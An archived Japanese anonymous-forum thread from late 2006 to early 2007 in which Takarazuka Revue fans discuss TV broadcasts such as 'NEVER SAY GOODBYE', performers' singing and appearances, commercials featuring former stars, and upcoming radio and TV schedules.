140 :名無しさん@花束いっぱい。:2006/12/25(月) 12:26:34 ID:0omo3RGL
>138
アサコが主役に見えないとは思わなかったけど、本当に鬱陶しかった。
あれで嫌いになった。



141 :名無しさん@花束いっぱい。:2006/12/25(月) 13:05:21 ID:+1S/j5S1
このスレはいつから劇評を書くスレに変わったの?


142 :名無しさん@花束いっぱい。:2006/12/25(月) 16:04:47 ID:AnHuBm0V
残りは正月の宙だけか…。あっという間だな。


143 :名無しさん@花束いっぱい。:2006/12/25(月) 20:24:03 ID:ezDnJNl4
本日夜9時よりBSジャパンで宝塚&モ娘。コラボの
ミュージカル版リボンの騎士放映だって。
モーヲタにはえらく評判良かったそうだけど観た人いるのかな?
チャルさん出てたよね。

144 :名無しさん@花束いっぱい。:2006/12/25(月) 22:01:09 ID:9ReQC4vW
>138
しかも、レヴュドリ、あさこが組むシーン全てかなみん。
それも似通ったシーンばっかりで、飽きる。
総踊りの繰り返しだし。

145 :名無しさん@花束いっぱい。:2006/12/25(月) 22:44:26 ID:unp1sfGw
>>144
>あさこが組むシーン全てかなみん
ここらへんはお披露目ってことで……

146 :名無しさん@花束いっぱい。:2006/12/26(火) 01:26:18 ID:3ydSaT1m
>>144
>似通ったシーンばかり

だって中村Bだもの。

147 :名無しさん@花束いっぱい。:2006/12/26(火) 01:49:07 ID:qB9tKbBQ
娘役は地味でも叩かれるし出過ぎても叩かれるし、たいへんねー(´・ω・`)


明らかにジジありきの宙はどうry

148 :名無しさん@花束いっぱい:2006/12/26(火) 03:04:33 ID:EbqN79KA
>147
つ「治外法権」

149 :名無しさん@花束いっぱい。:2006/12/26(火) 04:55:23 ID:6yM57xNg
砂漠かなみん>くるみ割りまーちゃん>阿国サエコ>ピエロふーちゃん>>>>>>>>>>>>白柳テツコ

150 :名無しさん@花束いっぱい。:2006/12/26(火) 06:15:11 ID:Uq0s3a8U
1

151 :名無しさん@花束いっぱい。:2006/12/26(火) 15:56:12 ID:r1IdK2Pb
>143遅レスだけどお礼を。おかげで神さまで王様なチャルさんをみることができたよ。
すんげー貫禄

152 :名無しさん@花束いっぱい。:2006/12/26(火) 21:56:47 ID:NXolN8Lv
>>149 白柳テツ子w なつかしー!
これだね→ ttp://www.sankei.co.jp/enak/sumirestyle/2005/mar/kiji/08hanachan.html#top

153 :名無しさん@花束いっぱい。:2006/12/26(火) 22:00:11 ID:qB9tKbBQ
>>149
ちょい待て
くららがいないぞw

154 :名無しさん@花束いっぱい。:2006/12/26(火) 22:27:40 ID:oI8Zsktl
いきなりだけど
キュプルンのCMって
檀ちゃんなのかな?
すごい似てるんだけど。。

155 :名無しさん@花束いっぱい。:2006/12/26(火) 22:35:25 ID:3ydSaT1m
>>154似てるもなにも、檀ちゃん本人

156 :名無しさん@花束いっぱい。:2006/12/26(火) 22:43:47 ID:oI8Zsktl
>>155
ありがトン
やっぱ
檀ちゃんなんだね
結構前から
CMやってたけど
今更気付きましタン
武士の〜映画の前からもうCMに出てたんだね

157 :名無しさん@花束いっぱい。:2006/12/28(木) 00:48:09 ID:Bui+xC0r
12/31(日) NHK BS2 15:00〜18:00  真説 山椒太夫「世界劇 黄金の刻」
サエコさんが出演です。

1/1(月) NHK BS2 12:15〜15:15
宙組「NEVER SAY GOOD BYE」


158 :名無しさん@花束いっぱい。:2006/12/28(木) 01:10:11 ID:Vl/fEC38
プラチケって今日やんな!?
何時から??公式にら1時5分〜って書いてあったけど…

159 :名無しさん@花束いっぱい。:2006/12/28(木) 01:41:15 ID:pvZo6L9s
そういや、乙葉がやってる洗剤のCM、
ふーちゃんそっくりな人出てるんだが
本人かいな?
髪の長さも同じだよな…

160 :名無しさん@花束いっぱい。:2006/12/28(木) 09:30:14 ID:aIUO1lGi
>>159
ttp://www.kao.co.jp/attack/commercial/cm002.html
ここで見れるけど・・わからん

161 :名無しさん@花束いっぱい。:2006/12/28(木) 10:44:56 ID:N1WS2/SI
>159 多少似てるけど(途中で一瞬出てくる茶髪の人だよね)
ふーちゃんではないね。

162 :名無しさん@花束いっぱい。:2006/12/28(木) 17:08:18 ID:pvZo6L9s
そうか…
ふーちゃんではないのね…

163 :名無しさん@花束いっぱい。:2006/12/30(土) 13:04:13 ID:nvimD26a
来年から始まるNHKの番組で、音楽学校生で野々すみ花、白姫あかりって書いてるけど、いつ撮ったもの?
何でこの2人なんだろ?

164 :名無しさん@花束いっぱい。:2006/12/31(日) 01:10:08 ID:TfYQFZjV
AGE

165 :名無しさん@花束いっぱい。:2006/12/31(日) 13:55:24 ID:2QI2WNnZ
タカハナBS収録済み?
最後に今後について質問でたよね

166 :名無しさん@花束いっぱい。:2006/12/31(日) 14:04:14 ID:QxixSGTP
「一緒にコンサートやります」しか言わないと思うよ

167 :名無しさん@花束いっぱい。:2006/12/31(日) 17:08:49 ID:5kvAiM+n
「黄金の刻」、何故さえちゃんがキャスティングされたか解った。
似合う。

168 :名無しさん@花束いっぱい。:2006/12/31(日) 17:52:45 ID:4S5e7Usq
黄金の刻見逃した。。
似合ってたんだ〜
見たかったなぁ
明日のネバセイは見逃さずに見るぞ
楽しみ☆

169 :名無しさん@花束いっぱい。:2006/12/31(日) 18:56:35 ID:5kvAiM+n
>168
四日の深夜、BSHiで再放送があるようですよ。


170 :名無しさん@花束いっぱい。:2006/12/31(日) 19:00:37 ID:PLL1NcBH
「黄金の刻」は1月4日深夜(実質5日/BS‐hi)にも
放送があるそうですよ。

171 :名無しさん@花束いっぱい。:2007/01/01(月) 09:38:51 ID:flKEk9HQ
天皇杯と重なる
コマタコマタコマタ

172 :名無しさん@花束いっぱい。:2007/01/01(月) 12:17:27 ID:lvFm9vbs
>>169
>>170
ありがとうございます見逃さずに見ます〜!

173 :名無しさん@花束いっぱい。:2007/01/01(月) 14:08:49 ID:qcABq6fA
最近ヅカから遠ざかってたんだけど、
こんなにレベル低かったっけ。

174 :名無しさん@花束いっぱい。:2007/01/01(月) 14:35:59 ID:haNbjtvg
ネバーのこと?
これがレベル低く感じるなら、もう塚ファンに戻らない方がいいよ。
今年は益々レベルの低下が予想されるし。
だいたい現役塚ファンはレベルなんか論外だし。

175 :名無しさん@花束いっぱい。:2007/01/01(月) 15:03:03 ID:jxWn0XFg
それにしても、タカコちゃん何歌ってるか、
わからなかったんですけど・・。


176 :名無しさん@花束いっぱい。:2007/01/01(月) 15:13:07 ID:/OvqZqhY
次期トップのタニの歌を安心して聞けるようになるのはいつの日か…orz

177 :名無しさん@花束いっぱい。:2007/01/01(月) 15:20:04 ID:4RIoz2kF
まるで 学芸会のようだった 

ネバー!! ネバー!! SING AGAIN!!



178 :名無しさん@花束いっぱい。:2007/01/01(月) 15:27:16 ID:Nqkhk/X6
>>174
なんでそんなにムキになってるの?

179 :名無しさん@花束いっぱい。:2007/01/01(月) 15:50:15 ID:Zt7mXuJ6
ねばは再放送はないですよね…

180 :名無しさん@花束いっぱい。:2007/01/01(月) 16:04:06 ID:xsCCo6L8
オハナって結局自分のためにヅカにいたんだなと改めて思った・・・。


181 :名無しさん@花束いっぱい。:2007/01/01(月) 16:40:51 ID:R4b8JWV+
みんな自分のためじゃないの?

182 :名無しさん@花束いっぱい。:2007/01/01(月) 16:43:21 ID:3RG2gq6/
四季をヲタだけど東宝のミュージカルみたいで楽しかったよ。
でも、幕下りた後のカーニバルはいらなくね?

183 :名無しさん@花束いっぱい。:2007/01/01(月) 16:48:19 ID:mJyHoFSp
>>182
あれが無きゃ宝塚じゃなく只のミュージカルだから…

184 :名無しさん@花束いっぱい。:2007/01/01(月) 17:33:34 ID:xsCCo6L8
>>181
そりゃそうだが、
12年トップ居座るのはあまりにも周りが見えてないし
それに見合った他の活動を怠ってたのが気になるわけさ・・・。
ま、いいけどさ。

185 :名無しさん@花束いっぱい。:2007/01/01(月) 17:58:29 ID:lRx2812A
宙ネバー見ちゃった。
真ん中の2人以外にはタニとあひ、たっちんが華があるなぁと思った。
やっぱり花はすごい娘役だなと改めて思ったし、タカコもあのナチュラルさのままで頂点までいったのは空前絶後だなぁと思った。
本当にお似合いだと改めて感じた。

186 :名無しさん@花束いっぱい。:2007/01/01(月) 18:06:45 ID:4RIoz2kF
あのトップの歌はなんだ?娘役はOKだが

187 :名無しさん@花束いっぱい。:2007/01/01(月) 18:11:41 ID:WUwFFp+V
>185
たっちんに華がある?
感性の違い…感性の違い…だよね


188 :名無しさん@花束いっぱい。:2007/01/01(月) 18:49:06 ID:nLgdNnAg
たっちんより、あひのほうがさらに・・・まぁ映像だとクローズアップしてくれるしな・・・

189 : 【吉】 【1933円】 :2007/01/01(月) 18:51:16 ID:6iJWPSLD
今年の運勢は

190 :名無しさん@花束いっぱい。:2007/01/01(月) 19:02:54 ID:25r+maIM
最後のフィナーレ階段降りで
下手の初舞台生が躓いてて
なんかちょっと和んだ。

191 :名無しさん@花束いっぱい。:2007/01/01(月) 19:12:23 ID:A1QWCQU4
私はネバーは学芸会とは対極の位置にあるものだと思った・・・。
タニちゃんの歌だけは減らして欲しかったが。

192 :名無しさん@花束いっぱい。:2007/01/01(月) 19:35:37 ID:JywZMn/8
曲は良かった
作品としては半端でつまらない

193 :名無しさん@花束いっぱい。:2007/01/01(月) 19:41:15 ID:9IgtFuLd
タニよりあひの歌とセリフの声のちがいをやめてほしい!!!あれは笑っちゃうょ

194 :名無しさん@花束いっぱい。:2007/01/01(月) 19:42:42 ID:9IgtFuLd
タニよりあひの歌をなんとかしてほしい!!セリフと歌で声かわりすぎ

195 :名無しさん@花束いっぱい。:2007/01/01(月) 19:44:17 ID:9IgtFuLd
↑失礼なんか書けてないと思ったら2回書いてた(T-T;)

196 :名無しさん@花束いっぱい。:2007/01/01(月) 19:46:50 ID:3Q24zoP5
役柄のせいか、メイクも薄めだったし髪型も老けて見えた。
花ちゃんもパンツ姿とベレー帽が似合わなかったりでなんだかなぁ。


197 :名無しさん@花束いっぱい。:2007/01/01(月) 19:50:46 ID:mJyHoFSp
あひとるいるいが良かった。

198 : 【末吉】 【1334円】 :2007/01/01(月) 19:53:41 ID:DTEBxzAE
ゲストのハナちゃんきれいだった。
現役時代も手抜きや痛々しいほどの若作りやめてたら良かったのに。

199 :名無しさん@花束いっぱい。:2007/01/01(月) 19:56:26 ID:fA+DyTgk
花ちゃんは外部でも充分やっていける演技力だった。
たかこさんは・・・ナチュラルとはいっても
やっぱり宝塚的な演技なんだよね〜、外部は難しいかも。

200 :名無しさん@花束いっぱい。:2007/01/01(月) 20:30:16 ID:qK9/LxsH
しまった、明日だと思い込んでてレビュドリのビデオ見てたよ・・・orz

201 :名無しさん@花束いっぱい。:2007/01/01(月) 22:51:01 ID:VVIs9PPs
ここで聞いていいかな?
オリンピアーダのリハーサル中に「クーデターが起きた」って言いにくる市長役の方と、
闘牛士グループの中の、緑シャツの方の名前を教えて下さい。

宙スレ聞きにくくて…

202 :名無しさん@花束いっぱい。:2007/01/01(月) 23:35:21 ID:XVsDLExP
もうちょっといい歌詞にしてほしかった

203 :名無しさん@花束いっぱい。:2007/01/02(火) 01:09:59 ID:lKcNBCk3
ネバセイ見てる時
ちょうど親戚が来て
集中して見れなかった感情移入なんて全然できんかったよぉ。。
途中初舞台生の
ラインダンスで
親戚のおばちゃんが
宝塚の人は足太いのかしら?
ワイドテレビで見てるから太く見えるのかしら?と気にしててウケたけど。。
ネバセイの最後の方でやっぱり宝塚は見に行きたいと思わないと言ってた。。
タカハナをもってしてもファンじゃない人には厳しいみたい。。
>>190
最後の大階段で初舞台生、躓いてたね
サヨナラ公演だし
ヒャっとした。。
隣で降りてたルイルイも
一瞬、驚いてた感じに見えた。長くてスマソ

204 :名無しさん@花束いっぱい。:2007/01/02(火) 02:03:55 ID:jA3Q/sb0
>>201
市長は確か風莉じん。上手かったよね。
緑のマタドールは誰だっけなぁ。春風弥里が緑だった印象があるんだけど
違ってたらごめん…

205 :名無しさん@花束いっぱい。:2007/01/02(火) 02:26:05 ID:M2iojJKj
>>201
202さんじゃないけど一応確認した。
緑シャツのマタドールは八雲美佳です。
ちなみに春風は紫シャツ。
市長は風莉じんで合ってます。

206 :名無しさん@花束いっぱい。:2007/01/02(火) 02:26:48 ID:M2iojJKj
あ、202じゃなくて204さんの間違いです。

207 :名無しさん@花束いっぱい。:2007/01/02(火) 03:36:09 ID:wj5JDCUm
ネバ好きだ。
まりちゃん、えりなさんは、芝居も歌もリアルでいいなあ。
たかこさんは、こうやって画面を通すと、怪我の後遺症が残っていただろうことがよくわかって痛々しい。
でもヤッパかっこいいね。
それに何より宙の団結力がすがすがしい。
みられて良かった。

208 :名無しさん@花束いっぱい。:2007/01/02(火) 03:38:01 ID:wj5JDCUm
ごめん
あげちゃった…orz

209 :名無しさん@花束いっぱい。:2007/01/02(火) 03:52:49 ID:Eu/ywHlf
>>203
うちも同じ。
ネバー見てたら親戚がたくさんきて一緒に見てたら
「宝塚って足太い子多いなー。」とラインダンスでビックリしてた。
後は歌・・・下手だって嘆いてたよ。
インタビューのタカコさんとお花様のに関しては
「顔地味だね・・・・」って。
やっぱり何も知らない人や興味ない人からすると、宝塚って本当に
外部では厳しいんだろうなと実感。

私はネバーの作品自体が好きで、結構見入ってたんだけどね。


210 :名無しさん@花束いっぱい。:2007/01/02(火) 10:07:14 ID:dWm6fAYK
箱根駅伝見てたら、VISAのCMが…
商店街で目見開いて踊る雅子orz

211 :名無しさん@花束いっぱい。:2007/01/02(火) 10:46:34 ID:KUpgQrSd
発売中のテレビナビにCM撮影秘話みたいなの載ってたけど
ロケ地が川崎の商店街ってのが泣ける
でもオサ寿美花はきっちり仕事してエライと思った

212 :名無しさん@花束いっぱい。:2007/01/02(火) 11:36:17 ID:Xg4VFFuX
>>204>>205
ありがとう!
中堅男役不足な組ハァソなもので、ひかれました。
ほんと歌上手かったわ。

213 :名無しさん@花束いっぱい。:2007/01/02(火) 20:06:56 ID:Js7shWLc
>>209
まぁね。
オハナに隠れてあまり顔どうのこうのいわれないけど
よくよく見るとたかこさんてものすごい一般人顔だもんね。
造形がいい悪いじゃなくて芸能人顔ではない。

214 :名無しさん@花束いっぱい。:2007/01/02(火) 20:28:06 ID:Gd6PCZbG
BSネバー音響変だった・・orz
TCAに比べるとコーラスが何故!?て位汚いし。
やっぱり舞台は生で観るものだと改めて感じました。

OGお花様は歌のお姉さんみたいで好印象w

215 :名無しさん@花束いっぱい。:2007/01/02(火) 20:55:00 ID:V8n/98LA
>209
宝塚に限らず舞台人で美形の人の方が少ないと思うんだが・・・。
そもそも舞台で映える人、映像で映える人、静止画で映える人、って
それぞれ分かれるし。逆に人気女優が宝塚で人気スターになれるか?
と言われたらそうではないと思うし。
分かれる上に、それぞれその道で長年頑張って
舞台での見せ方や舞台向きの化粧、映像向きの見せ方や化粧など
研究を重ねてきているわけだから、単純比較するのはどうかと・・・。

ついでに、芸能界は沢山の人達がデビューして一時的に売れる人も僅かだし、
生き残る人は更に僅か。元宝塚に限らず、元モデルだろうがアイドルだろうが
子役出身の俳優だろうが、七光り俳優だろうが、生き残るのは厳しいよ。
宝塚のOGの事は憶えているから、元宝塚は芸能界は厳しいと感じるだけ。

216 :omikuji!dama!:2007/01/02(火) 21:07:31 ID:5BvYzGaE
ネバー見たらあらためて、主演の力で組の実力がこんなにも差がでるんだなと思った。
ネバーのときは、宙はすごく実力ある組で充実してると思ってたのに
かしげトップになって、あまりの宙組の素人ぽさ、下手さに愕然としたもん。
ショーなんて見てられなかった。ダンスは下手だし群舞バラバラ。
ネバーテレビで久々にみたら、やっぱりこの頃の宙はすごかったなって思った。
主演が変わるだけで、組の実力は雲泥の差だよね!

217 :名無しさん@花束いっぱい。:2007/01/02(火) 21:30:23 ID:VlYdYg9s
かしげ叩きたいんだろうけど、結果として宙組子をおとしめてるよ

218 :名無しさん@花束いっぱい。:2007/01/02(火) 21:46:47 ID:SiZhrR4s
宙組は昔から群舞バラバラっすよヽ(^-^)
身長もバラバラだしね

何でもこい!!って勢いいいしそこが魅力。

219 :名無しさん@花束いっぱい。:2007/01/02(火) 22:19:27 ID:vp7NjKOx
粘なげーよ単調だよ地味だよ
上手いのはわかるけどこれはタカハナ好きじゃないと見れない・・

220 :名無しさん@花束いっぱい。:2007/01/02(火) 23:38:33 ID:33pbVvj8
骨太だが宝塚らしさもあり良い作品だと思った。無駄な場面もなかったから長いとも思わなかったし。むしろタカハナ好きではなくても楽しめる作品だと思った。主演者のファンじゃないと楽しめないのは、タカハナならピエール、最近の塚連続放送の中ならジャジーが断トツ。

221 :名無しさん@花束いっぱい。:2007/01/02(火) 23:42:48 ID:uOLbXnOL
ジャジーはCSで初めて見たけど耐えられた。
粘は途中でギブ…orz

222 :名無しさん@花束いっぱい。:2007/01/03(水) 13:35:16 ID:IR1Rd1Bt
ネバーは録画してあるけど未だに観る気がしない。
ジャジーは結構温かみを感じた作品だった。

223 :名無しさん@花束いっぱい。:2007/01/03(水) 14:09:21 ID:UdeKcndG
再演してほしい作品だな。しっかし宙は歌うまいなーコーラスも迫力凄い!
花總さんは外部でも見てみたいな。


224 :名無しさん@花束いっぱい。:2007/01/03(水) 15:20:34 ID:nuMBMyp+
正直粘に限らず、
トップのサヨナラ公演で宛て書きの作品は、再演して欲しくないかな・・・

まして粘は下級生が動く背景・・・orz

225 :名無しさん@花束いっぱい。:2007/01/04(木) 11:31:10 ID:PLVzaTHi
ジャジーは、案外テレビ向け。
ファミリーミュージカルチックで。


ネバーみたいな作品こそ、玄人受けしそうだが
小難しいのが苦手な人には、無理なのでは?

226 :名無しさん@花束いっぱい。:2007/01/04(木) 13:04:10 ID:X2XRYggL
スター目当て、エンターテイメント性が高いのがウリの
宝塚の舞台に敢えて小難しい作品を当てるのは、
脚本家の独りよがりだと思うのは私だけ?

テレビで放送するのが前提なら、
宝塚ってスゴイと一般視聴者に思わせる意味もあるだろうけど、
それじゃ、高いチケット代払って見に来るお客さんを無視してるよね。

227 :名無しさん@花束いっぱい。:2007/01/04(木) 14:19:49 ID:Im8p+nc2
>ネバーみたいな作品こそ、玄人受けしそうだが
>小難しいのが苦手な人には、無理なのでは?

出演者の技術 歌唱力がなっていない(特にトップ達)

作品云々以前の問題なのです

228 :名無しさん@花束いっぱい。:2007/01/04(木) 14:28:00 ID:wSjxFajp
ネバーは、歌がしっかり歌える人に
ヴィセントとアギラール役をやってもらえるなら
再演見てみたい。
たにちゃんとあひちゃんのあれはあれで別にいいんだけど
やっぱり歌がもったいなかったなと思うんで。
個人的にはゆみこさんのヴィセントとか、とうこさんのアギラールとか
歌だけでも聞いてみたいです。


229 :名無しさん@花束いっぱい。:2007/01/04(木) 18:05:24 ID:uGho8AFv
>出演者の技術 歌唱力がなっていない(特にトップ達)

これはどこの組でもだいたい同じ


230 :名無しさん@花束いっぱい。:2007/01/04(木) 18:48:40 ID:n9OX41FK
ネバーは曲が良かったのに演出がイマイチだった。
締まるべきところが締まってないという感じ。
悪くは無いんだけど、演出とか配役次第では
もっと面白く出来たような気がした。

231 :名無しさん@花束いっぱい。:2007/01/04(木) 21:31:31 ID:YZURHx1N
タニとアヒはキャラが嵌ってたから別に気にならなかった。
ただ、2幕の脚本、演出がイマイチ。

232 :名無しさん@花束いっぱい。:2007/01/06(土) 02:10:42 ID:0DYMPf0+
そろそろスレ違いだが、
アギラールは中途半端になったのがなぁ・・・

233 :名無しさん@花束いっぱい。:2007/01/06(土) 10:21:38 ID:Yf1xAiOn
宝塚の場合仕方ない。
ネバーは大好きな作品だけど、宝塚である限り、あれ以上アギを詳しく書くことはできないと思う。
外部作品であったなら、ヒロインやアギラールの心情をもっと書き込めたかも。
アギちゃんの芝居がまだ未熟ってのも否定できないけど、
それもまた宝塚は主役より若い子が演じるから仕方ない。
バルセロナ市長役も上手なんだけど、映像で見ると笑ってしまう。
あの役こそ専科にやって欲しかったなぁ。
でもナンダカンダ言って大好きな作品。
ネバーであれだけ見せてくれた宙組子が今あんな作品に全力注いでると思うとチト気の毒。

234 :名無しさん@花束いっぱい。:2007/01/06(土) 14:03:20 ID:FVj67L3w
豚切ごめん。
シャンテバザールのCM流れ出したね。
あいあいが長々映ってる。
ナルの時もだったけど。

235 :名無しさん@花束いっぱい。:2007/01/06(土) 14:03:41 ID:9SRT6Sip
豚切りスマソ
シャンテバザールのCMにあいあいが出てた。


236 :名無しさん@花束いっぱい。:2007/01/06(土) 15:01:08 ID:1gnOPHpw
お幸せに!

237 :名無しさん@花束いっぱい。:2007/01/06(土) 18:01:30 ID:FVj67L3w
実損ねたニューイヤーコンサート、再放送今見てた。
終わって余韻に浸りたいんだからスタジオ要らないなーと思ったけど
ずんこさんが出ていてビクーリした。

238 :名無しさん@花束いっぱい。:2007/01/09(火) 13:32:01 ID:0C/gHxe5
カフェブレイクの総集編みた。
ウメは結果、最後の出演になったんだなあ。

239 :名無しさん@花束いっぱい。:2007/01/09(火) 13:57:12 ID:ICPf90y3
槇野っちの頃のように、トップも出てくれればいいのにと思う>カフェブレイク
ご贔屓の面白嫁さんのを地上波でも見てみたかった…

240 :名無しさん@花束いっぱい。:2007/01/09(火) 14:00:26 ID:fypicQj4
カヘブレ総集編、どういう人選なのかなぁ…
最後にナルちゃん見たかった

241 :ラジオ出演情報:2007/01/09(火) 17:44:36 ID:wp9jKz1m
2007/01/09
「ビバ!!タカラジェンヌ」(追)

ラジオ関西(558KHz) ・毎週日曜 22:00〜22:30

2月の出演予定…
    4日    (月組)遼河はるひ
   11日    (花組)夏美よう
   18日    (花組)真飛 聖
   25日    (花組)未涼亜希


3月の出演予定…
    4日    (花組)真野すがた
   11日    (花組)朝夏まなと
   18日    (花組)桜 一花
   

※ 放送時間は24時間表記をしています。
※ 出演者、放送時間は放送局の都合により変更になることがあります。

242 :テレビ出演情報:2007/01/09(火) 17:47:04 ID:wp9jKz1m
2007/01/09
北陸放送「イブニング5」(追)

○放送日時 1月12日(金)16:54〜「イブニング5」      

○放送局 MRO(北陸放送)

○出演者 桜 一花、白鳥かすが(宝塚歌劇団 花組)
       大月さゆ、央雅光希(宝塚歌劇団 雪組)

○内容
番組内 イブニングeye「みんなの憧れ 宝塚!」のコーナーに出演いたします。
 
※放送時間は24時間表記をしています。
※出演者、放送時間は放送局の都合により変更になることがあります。

243 :名無しさん@花束いっぱい。:2007/01/09(火) 22:09:08 ID:kD8idrj+
今日からスタートの「秘密の花園」
ミキさんめっさキレイ〜しかも若返ってる気がする。

244 :名無しさん@花束いっぱい。:2007/01/10(水) 14:33:46 ID:IE9ocBqs
実況でみきさんのプリケツぶりが話題になってた…>ヒミツの花園

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)